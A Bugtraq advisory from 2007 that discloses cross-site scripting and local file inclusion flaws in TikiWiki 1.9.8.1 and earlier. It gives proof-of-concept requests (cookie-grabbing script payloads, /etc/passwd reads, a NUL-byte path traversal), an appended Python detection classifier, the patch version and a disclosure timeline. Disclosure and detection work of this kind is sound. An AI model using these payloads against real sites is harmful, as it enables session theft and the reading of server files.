TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion
- From: L4teral <l4teral@xxxxxxxxx>
- Date: Thu, 25 Oct 2007 21:42:21 +0200
======================================================================
TikiWiki <= 1.9.8.1 Cross Site Scripting / Local File Inclusion
======================================================================
Author: L4teral <l4teral [4t] gmail com>
Impact: Cross Site Scripting / Local File Inclusion
Status: patch available
------------------------------
Affected software description:
------------------------------
Application: TikiWiki
Version: <= 1.9.8.1
Vendor: http://tikiwiki.org
Description:
TikiWiki (Tiki) is your Groupware/CMS (Content Management System) solution.
--------------
Vulnerability:
--------------
XSS:
1. The password reminder page is vulnerable to cross site scripting.
2. Script code can be embedded into wiki pages.
3. The script db/tiki-db.php is vulnerable to cross site scripting.
LFI:
4. The script db/tiki-db.php is vulnerable to local file inclusion attacks.
5. The script tiki-imexport_languages.php is vulnerable to local file inclusion attacks.
------------
PoC/Exploit:
------------
XSS:
1. Enter the following in the form: <img src="javascript:alert(document.cookie)">
URL: http://localhost/tikiwiki/tiki-remind_password.php
POSTDATA:
username=%3Cimg+src%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3E
remind=send+me+my+password
2. Create a wiki page containing:
{img src=javascript:alert(document.cookie) }
3. http://localhost/tikiwiki/tiki-index.php?local_php=<script>alert(document.cookie)</script>
LFI:
4. Requires register_globals to be enabled:
http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd
http://localhost/tikiwiki/tiki-index.php?local_php=/etc/passwd
5. The feature lang_use_db (use database for translation) must be activated:
URL: http://localhost/tikiwiki/tiki-imexport_languages.php
POSTDATA: imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import
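As an added example from the detection side (not part of this advisory or of TikiWiki), the following Python classifier flags the request shapes listed above so they can be turned into a WAF rule or a log-review check. The parameter names are the ones this advisory identifies; the sample requests are constructed from the PoCs and the benign request is made up.

```python
# Added example, not from the advisory: classify one HTTP request as carrying
# an LFI-style or XSS-style value in the parameters TikiWiki <= 1.9.8.1 mishandles.
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Parameters the advisory names as reaching a file include (PoC items 4 and 5).
LFI_PARAMS = {"error_handler_file", "local_php", "imp_language"}
# Directory traversal, an absolute path, or a NUL byte (the %00 truncation in PoC 5).
LFI_PATTERN = re.compile(r"(\.\./|\.\.\\|^/|\x00)")
# Script-bearing values as in PoC items 1-3: a javascript: URL or a <script> tag.
XSS_PATTERN = re.compile(r"(javascript\s*:|<\s*script\b)", re.IGNORECASE)


def classify_request(method, url, body=""):
    """Return sorted findings like 'lfi:<param>' / 'xss:<param>' for one request."""
    parts = urlsplit(url)
    params = parse_qs(parts.query, keep_blank_values=True)
    if method.upper() == "POST" and body:
        for key, vals in parse_qs(body, keep_blank_values=True).items():
            params.setdefault(key, []).extend(vals)
    findings = set()
    for name, values in params.items():
        for raw in values:
            value = unquote(raw)  # parse_qs decoded once; this also catches double-encoding
            if name in LFI_PARAMS and LFI_PATTERN.search(value):
                findings.add(f"lfi:{name}")
            if XSS_PATTERN.search(value):
                findings.add(f"xss:{name}")
    return sorted(findings)


# Constructed sample requests mirroring the PoCs above, plus one benign request.
SAMPLES = [
    ("POST", "http://localhost/tikiwiki/tiki-remind_password.php",
     "username=%3Cimg+src%3D%22javascript%3Aalert%28document.cookie%29%3B%22%3E"
     "&remind=send+me+my+password"),
    ("GET", "http://localhost/tikiwiki/tiki-index.php?local_php=<script>alert(document.cookie)</script>", ""),
    ("GET", "http://localhost/tikiwiki/tiki-index.php?error_handler_file=/etc/passwd", ""),
    ("POST", "http://localhost/tikiwiki/tiki-imexport_languages.php",
     "imp_language=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00&import=import"),
    ("GET", "http://localhost/tikiwiki/tiki-index.php?page=HomePage", ""),  # benign
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample[1], classify_request(*sample))
```

Values are matched after URL decoding, so the encoded POST bodies above are classified the same way as their decoded equivalents.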
---------
Solution:
---------
Update to 1.9.8.2 or later:
https://sourceforge.net/project/showfiles.php?group_id=64258&package_id=112134&release_id=549549
---------
Timeline:
---------
23.10.2007 - vendor informed
25.10.2007 - vendor released patch
25.10.2007 - public disclosure